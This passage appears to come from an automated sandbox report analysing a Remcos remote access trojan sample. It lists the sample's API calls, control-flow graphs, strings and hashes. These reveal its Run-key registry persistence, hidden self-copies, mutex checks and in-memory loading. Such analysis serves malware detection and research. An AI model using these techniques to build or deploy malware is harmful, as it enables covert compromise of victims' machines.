                                                  • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                  • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                  • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                  • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                  • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                  • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                  • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BE09
                                                  • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE16
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                                  • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
                                                  • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                                  • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BE53
                                                  • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE60
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$HandleLibraryLoadModule
                                                  • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                  • API String ID: 384173800-625181639
                                                  • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                  • Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
                                                  • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                  • Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE
                                                  Function 0040D767 Relevance: 93.5, APIs: 12, Strings: 41, Instructions: 799COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 5 40d767-40d7e9 call 41bce3 GetModuleFileNameW call 40e168 call 401fbd * 2 call 41afc3 call 40e8bd call 401d8c call 43e820 22 40d835-40d8fd call 401d64 call 401e8f call 401d64 call 404cbf call 405ce6 call 401eef call 401eea * 2 call 401d64 call 401ebd call 40541d call 401d64 call 404bb1 call 401d64 call 404bb1 5->22 23 40d7eb-40d830 call 40e986 call 401d64 call 401e8f call 40fcba call 40e937 call 40e155 5->23 69 40d950-40d96b call 401d64 call 40b125 22->69 70 40d8ff-40d94a call 4085b4 call 401eef call 401eea call 401e8f call 4124b7 22->70 48 40dc96-40dca7 call 401eea 23->48 79 40d9a5-40d9ac call 40bed7 69->79 80 40d96d-40d98c call 401e8f call 4124b7 69->80 70->69 102 40e134-40e154 call 401e8f call 412902 call 4112b5 70->102 90 40d9b5-40d9bc 79->90 91 40d9ae-40d9b0 79->91 80->79 98 40d98e-40d9a4 call 401e8f call 412902 80->98 92 40d9c0-40d9cc call 41a463 90->92 93 40d9be 90->93 96 40dc95 91->96 103 40d9d5-40d9d9 92->103 104 40d9ce-40d9d0 92->104 93->92 96->48 98->79 107 40da18-40da2b call 401d64 call 401e8f 103->107 108 40d9db call 40697b 103->108 104->103 128 40da32-40daba call 401d64 call 41ae08 call 401e18 call 401e13 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f 107->128 129 40da2d call 4069ba 107->129 117 40d9e0-40d9e2 108->117 120 40d9e4-40d9e9 call 40699d call 4064d0 117->120 121 40d9ee-40da01 call 401d64 call 401e8f 117->121 120->121 121->107 138 40da03-40da09 121->138 163 40db22-40db26 128->163 164 40dabc-40dad5 call 401d64 call 401e8f call 43a611 128->164 129->128 138->107 140 40da0b-40da11 138->140 140->107 142 40da13 call 4064d0 140->142 142->107 165 40dcaa-40dd01 call 436050 call 4022f8 call 401e8f * 2 call 41265d call 4082d7 163->165 166 40db2c-40db33 163->166 164->163 188 40dad7-40db03 call 401d64 call 401e8f call 401d64 call 401e8f call 40c89e 164->188 219 40dd06-40dd5c call 401d64 call 401e8f call 401f66 call 401e8f call 4126d2 call 401d64 call 401e8f call 43a5e7 165->219 168 40dbb1-40dbbb call 4082d7 166->168 169 40db35-40dba7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 40bc67 166->169 178 40dbc0-40dbe4 call 4022f8 call 4338c8 168->178 258 40dbac-40dbaf 169->258 199 40dbf3 178->199 200 40dbe6-40dbf1 call 436050 178->200 233 40db08-40db1d call 401e18 call 401e13 188->233 203 40dbf5-40dc6a call 401e07 call 43e349 call 4022f8 call 401e8f call 4022f8 call 401e8f call 4128a2 call 4338d1 call 401d64 call 40b125 199->203 200->203 203->219 274 40dc70-40dc91 call 401d64 call 41ae08 call 40e219 203->274 272 40dd79-40dd7b 219->272 273 40dd5e 219->273 233->163 258->178 276 40dd81 272->276 277 40dd7d-40dd7f 272->277 275 40dd60-40dd77 call 41beb0 CreateThread 273->275 274->219 292 40dc93 274->292 280 40dd87-40de66 call 401f66 * 2 call 41a686 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f StrToIntA call 409517 call 401d64 call 401e8f 275->280 276->280 277->275 330 40dea1 280->330 331 40de68-40de9f call 43360d call 401d64 call 401e8f CreateThread 280->331 292->96 333 40dea3-40debb call 401d64 call 401e8f 330->333 331->333 342 40def9-40df0c call 401d64 call 401e8f 333->342 343 40debd-40def4 call 43360d call 401d64 call 401e8f CreateThread 333->343 354 40df6c-40df7f call 401d64 call 401e8f 342->354 355 40df0e-40df67 call 401d64 call 401e8f call 401d64 call 401e8f call 40c854 call 401e18 call 401e13 CreateThread 342->355 343->342 365 40df81-40dfb5 call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 40b95c 354->365 366 40dfba-40dfde call 41a7a2 call 401e18 call 401e13 354->366 355->354 365->366 386 40dfe0 366->386 387 40dfe3-40dff6 CreateThread 366->387 386->387 390 40e004-40e00b 387->390 391 40dff8-40e002 CreateThread 387->391 394 40e019-40e020 390->394 395 40e00d-40e017 CreateThread 390->395 391->390 398 40e022-40e025 394->398 399 40e033-40e038 394->399 395->394 401 40e073-40e08e call 401e8f call 41246e 398->401 402 40e027-40e031 398->402 404 40e03d-40e06e call 401f66 call 404c9e call 401f66 call 41a686 call 401eea 399->404 414 40e094-40e0d4 call 41ae08 call 401e07 call 412584 call 401e13 call 401e07 401->414 415 40e12a-40e12f call 40cbac call 413fd4 401->415 402->404 404->401 433 40e0ed-40e0f2 DeleteFileW 414->433 415->102 434 40e0f4-40e125 call 41ae08 call 401e07 call 41297a call 401e13 * 2 433->434 435 40e0d6-40e0d9 433->435 434->415 435->434 436 40e0db-40e0e8 Sleep call 401e07 435->436 436->433
                                                  APIs
                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\yPIOW6yoPi.exe,00000104), ref: 0040D790
                                                    • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                  • String ID: 0DG$@CG$@CG$Access Level: $Administrator$C:\Users\user\Desktop\yPIOW6yoPi.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-I7G983$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                                  • API String ID: 2830904901-1929690600
                                                  • Opcode ID: b536abd86453a7b97e05814882efc9b96c8c01a69ecb7edc18bfef705cc2de13
                                                  • Instruction ID: 4071723a11783d2da8da933f82134b9c6f3815e49c8d87d463163304bf45e319
                                                  • Opcode Fuzzy Hash: b536abd86453a7b97e05814882efc9b96c8c01a69ecb7edc18bfef705cc2de13
                                                  • Instruction Fuzzy Hash: 4032A360B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E
                                                  Function 0040BC67 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 203fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • _wcslen.LIBCMT ref: 0040BC75
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\yPIOW6yoPi.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                  • _wcslen.LIBCMT ref: 0040BD54
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\yPIOW6yoPi.exe,00000000,00000000), ref: 0040BDF2
                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                  • _wcslen.LIBCMT ref: 0040BE34
                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                  • ExitProcess.KERNEL32 ref: 0040BED0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                  • String ID: 6$C:\Users\user\Desktop\yPIOW6yoPi.exe$del$open$BG$BG
                                                  • API String ID: 1579085052-1132121390
                                                  • Opcode ID: 1dfc8a95e9f2fa8f15eef755b153a8034996a407d8c67b2864cbd51f99b60f53
                                                  • Instruction ID: b3868b96a5a73c1b880f625a38b4c220dd420420d05b0a2cc1e840e3cd02b35d
                                                  • Opcode Fuzzy Hash: 1dfc8a95e9f2fa8f15eef755b153a8034996a407d8c67b2864cbd51f99b60f53
                                                  • Instruction Fuzzy Hash: D251B0212043406BD609B722EC52EBF77999F81719F10443FF985A66E2DF3CAD4582EE
                                                  Function 0040C89E Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LongNamePath
                                                  • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                  • API String ID: 82841172-425784914
                                                  • Opcode ID: 2c32c8423f05266584aa4a08fe5fa9c2e4569a415b98fb848e0406cdb68be249
                                                  • Instruction ID: 51cedb133b73bca78a9fc1065318242b3d6e678e936cb09da4a185c9a299c852
                                                  • Opcode Fuzzy Hash: 2c32c8423f05266584aa4a08fe5fa9c2e4569a415b98fb848e0406cdb68be249
                                                  • Instruction Fuzzy Hash: 39413A721442009BC214FB21DD96DAFB7A4AE90759F10063FB546720E2EE7CAA49C69F
                                                  Function 020F003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 628 20f003c-20f0047 629 20f004c-20f0263 call 20f0a3f call 20f0e0f call 20f0d90 VirtualAlloc 628->629 630 20f0049 628->630 645 20f028b-20f0292 629->645 646 20f0265-20f0289 call 20f0a69 629->646 630->629 647 20f02a1-20f02b0 645->647 649 20f02ce-20f03c2 VirtualProtect call 20f0cce call 20f0ce7 646->649 647->649 650 20f02b2-20f02cc 647->650 657 20f03d1-20f03e0 649->657 650->647 658 20f0439-20f04b8 VirtualFree 657->658 659 20f03e2-20f0437 call 20f0ce7 657->659 661 20f04be-20f04cd 658->661 662 20f05f4-20f05fe 658->662 659->657 663 20f04d3-20f04dd 661->663 664 20f077f-20f0789 662->664 665 20f0604-20f060d 662->665 663->662 669 20f04e3-20f0505 LoadLibraryA 663->669 667 20f078b-20f07a3 664->667 668 20f07a6-20f07b0 664->668 665->664 670 20f0613-20f0637 665->670 667->668 672 20f086e-20f08be LoadLibraryA 668->672 673 20f07b6-20f07cb 668->673 674 20f0517-20f0520 669->674 675 20f0507-20f0515 669->675 676 20f063e-20f0648 670->676 680 20f08c7-20f08f9 672->680 677 20f07d2-20f07d5 673->677 678 20f0526-20f0547 674->678 675->678 676->664 679 20f064e-20f065a 676->679 681 20f07d7-20f07e0 677->681 682 20f0824-20f0833 677->682 683 20f054d-20f0550 678->683 679->664 684 20f0660-20f066a 679->684 685 20f08fb-20f0901 680->685 686 20f0902-20f091d 680->686 687 20f07e4-20f0822 681->687 688 20f07e2 681->688 692 20f0839-20f083c 682->692 689 20f0556-20f056b 683->689 690 20f05e0-20f05ef 683->690 691 20f067a-20f0689 684->691 685->686 687->677 688->682 693 20f056f-20f057a 689->693 694 20f056d 689->694 690->663 695 20f068f-20f06b2 691->695 696 20f0750-20f077a 691->696 692->672 697 20f083e-20f0847 692->697 699 20f057c-20f0599 693->699 700 20f059b-20f05bb 693->700 694->690 701 20f06ef-20f06fc 695->701 702 20f06b4-20f06ed 695->702 696->676 703 20f084b-20f086c 697->703 704 20f0849 697->704 711 20f05bd-20f05db 699->711 700->711 705 20f06fe-20f0748 701->705 706 20f074b 701->706 702->701 703->692 704->672 705->706 706->691 711->683
                                                  APIs
                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 020F024D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID: cess$kernel32.dll
                                                  • API String ID: 4275171209-1230238691
                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                  • Instruction ID: fd96abfbcbc1ba3c88088248ade3727876ff70d63f7c93e0f6d1ce76c48a2d52
                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                  • Instruction Fuzzy Hash: 54526A74A01229DFDBA4CF58C984BACBBB1BF09304F1480D9E54DAB756DB30AA85DF14
                                                  Function 0041A463 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                    • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
                                                    • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                    • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                    • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                  • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                  • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                  • API String ID: 782494840-2070987746
                                                  • Opcode ID: c28e8bf06c7bd464c54825a7174b2fee0dd0f803164bd22ac966e04bdcbe38d4
                                                  • Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
                                                  • Opcode Fuzzy Hash: c28e8bf06c7bd464c54825a7174b2fee0dd0f803164bd22ac966e04bdcbe38d4
                                                  • Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE
                                                  Function 00404AB1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 736 404ab1-404ab8 737 404b17 736->737 738 404aba-404abf 736->738 741 404b19-404b1a 737->741 739 404ac1-404ada call 401f66 * 2 738->739 740 404ae7-404b15 CreateEventA SetEvent WaitForSingleObject CloseHandle 738->740 745 404adf-404ae4 call 41a686 739->745 740->741 745->740
                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00475B70,0040483F,00000001,?,?,00000000,00475B70,004017F3), ref: 00404AED
                                                  • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404AF9
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,004017F3), ref: 00404B04
                                                  • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404B0D
                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                  • String ID: KeepAlive | Disabled
                                                  • API String ID: 2993684571-305739064
                                                  • Opcode ID: 9775dfb5b9107c1e5075dd8c94ff0be4df24a6852b4aa6a8c0f4e8621e736b03
                                                  • Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
                                                  • Opcode Fuzzy Hash: 9775dfb5b9107c1e5075dd8c94ff0be4df24a6852b4aa6a8c0f4e8621e736b03
                                                  • Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B
                                                  Function 00412774 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 748 412774-412787 RegCreateKeyW 749 4127c6 748->749 750 412789-4127c4 call 4022f8 call 401e07 RegSetValueExW RegCloseKey 748->750 752 4127c8-4127d4 call 401e13 749->752 750->752
                                                  APIs
                                                  • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041277F
                                                  • RegSetValueExW.KERNEL32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004742E0,762337E0,?), ref: 004127AD
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004742E0,762337E0,?,?,?,?,?,0040BE18,?,00000000), ref: 004127B8
                                                  Strings
                                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041277D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateValue
                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                  • API String ID: 1818849710-1051519024
                                                  • Opcode ID: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
                                                  • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                  • Opcode Fuzzy Hash: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
                                                  • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                                  Function 0040BED7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 758 40bed7-40bf03 call 401e8f CreateMutexA GetLastError
                                                  APIs
                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
